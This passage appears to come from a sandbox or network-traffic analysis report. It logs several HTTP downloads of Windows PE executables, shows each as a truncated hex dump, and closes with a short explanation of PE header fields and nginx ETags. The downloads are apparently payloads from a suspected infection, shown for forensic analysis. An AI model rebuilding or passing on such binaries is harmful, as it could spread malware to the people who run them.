Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:56 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 
72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 
00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 
6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 
00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:58 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:56:05 GMTContent-Type: application/octet-streamContent-Length: 328232Last-Modified: Wed, 28 Aug 2024 19:58:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf8181-50228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 81 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d4 04 00 00 06 00 00 00 00 00 00 5e f2 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 b7 52 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 f2 04 00 53 00 00 00 00 00 05 00 42 02 00 00 00 00 00 00 00 00 00 00 00 dc 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 d0 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d2 04 00 00 20 00 00 00 d4 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 05 00 00 04 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f2 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e0 04 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7e 30 aa dd a7 42 95 cb 06 7e 16 66 63 df d6 a0 d8 12 38 7f e2 e9 9d 75 90 20 b8 08 26 b0 72 e1 93 c7 f4 8f 83 9b ac 8e 4b f5 22 59 60 5f 15 96 a3 a6 42 77 90 ef c5 6f 13 ea 52 a9 58 63 d2 60 d5 dd df 0c 0d a2 1f 28 6f 9c 85 6e a6 8e e0 fc b9 45 35 4c 60 73 b3 c3 8d 42 cf 26 f7 33 b8 6a 6d de fc 63 20 91 ed cd be 31 90 9c ff 58 e3 7a 96 6b 48 f4 6d 19 fd 4a 5b 5f 73 4e 91 f3 4f 8b cc a9 c0 16 08 57 c4 08 a6 0b bc bd 12 2f d1 8e 95 4d f3 33 9d b3 65 0c 7a 3a af d6 ba af ab 37 49 c5 79 1f 37 a8 4c 81 39 f6 f4 6f 20 c0 31 e0 19 f9 c3 3b 25 eb 01 b8 6e 7a 34 da ea 95 57 6c 45 6e 23 a5 37 4e bb 01 f0 f4 0b ea 3a 76 c0 ff 8a a5 4d 1a 19 f1 49 96 b2 04 43 b1 fd a2 88 6b bb 9d fe 7d f2 b7 c1 66 38 5c 78 ba 71 2b 5f e1 77 df 75 21 e9 81 94 62 5a 00 95 78 0b 42 b0 38 79 a1 2d 8c cd 5d 43 97 1b 34 95 a4 d1 35 0e 80 6b 9e 81 83 32 83 f7 2d db 35 50 f3 b3 b0 df db 89 f7 4e 9a 21 9b 57 25 fd f7 c8 06 6d 4
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:56:06 GMTContent-Type: application/octet-streamContent-Length: 196136Last-Modified: Wed, 28 Aug 2024 19:09:07 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf75d3-2fe28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 75 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d0 02 00 00 06 00 00 00 00 00 00 5e ee 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 ad 77 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 ee 02 00 53 00 00 00 00 00 03 00 42 02 00 00 00 00 00 00 00 00 00 00 00 d8 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 d0 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 ce 02 00 00 20 00 00 00 d0 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 03 00 00 04 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ee 02 00 00 00 00 00 48 00 00 00 02 00 05 00 98 dc 02 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 44 d3 a5 67 31 84 4d 3c 80 8f 5a 66 48 41 ec 5d b4 52 28 f8 87 bd a7 fe c7 d7 8f 76 ac 0c 58 37 0b 55 22 d0 37 b7 8b 2d 4f 2c 93 1d 3f 76 31 a8 83 b0 7a 11 8f a4 d2 3f 14 6c 97 0a 3e c8 b7 5e d7 10 27 10 50 4c 5e 1c 8a 6c 53 ae 0a 47 c6 63 f5 7d a5 af 50 e0 89 16 0e 80 38 b7 91 9e 6f 53 fe d6 4d de ae 16 c9 ac 5b 97 d0 bb 86 09 2d 13 1a 66 66 94 b2 63 66 bb 0b 95 48 12 c9 e7 6a c4 c7 88 c9 25 18 6e a5 92 c3 dd 1e 61 2f 3f 72 1a 52 e9 be 22 c4 19 13 ca d5 12 a0 bd fb 5d 5a 92 d4 f7 a5 6a 53 96 f1 ef 6b c3 57 ba 61 39 39 e1 d3 11 94 7c 0e 70 79 95 f8 6d c1 73 7c 81 68 85 c5 b9 ac 97 0a e6 c2 34 15 cf f0 58 37 04 a7 b6 b5 32 8d ed 9b 83 3f c5 34 50 b4 4e 15 be 12 d8 38 33 22 8e fa 70 65 e1 da 6f 02 81 c2 63 b7 96 77 74 f5 bc 6a fa d0 4c a6 5f 4b b5 af ec 17 51 40 80 15 3b 73 05 e7 d1 08 11 3f 52 4b 96 16 47 4e 00 02 26 91 63 1d ad f4 93 0f 4e 05 dc e6 13 60 a3 70 d1 32 01 1c 2b 06 59 ad 8e 45 3
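Every 200 response above is a PE download: each Data Raw dump opens with the MZ signature and the DOS stub, and the PE header that follows carries facts the HTTP headers do not: the COFF TimeDateStamp, the section table, the Certificate Table entry, and the CLR data directory that marks a managed (.NET) image. nginx builds its ETag as hex(mtime)-hex(size), so the compile stamp can be compared with the upload time directly from the two headers. The script below is an added example written for this section, not part of the report or the sandbox's own tooling. Its only input is the first 592 bytes of the 196136-byte download with ETag "66cf75d3-2fe28", re-typed from the dump above (runs of zero bytes written as bytes(n)); all function and variable names are the example's own.

```python
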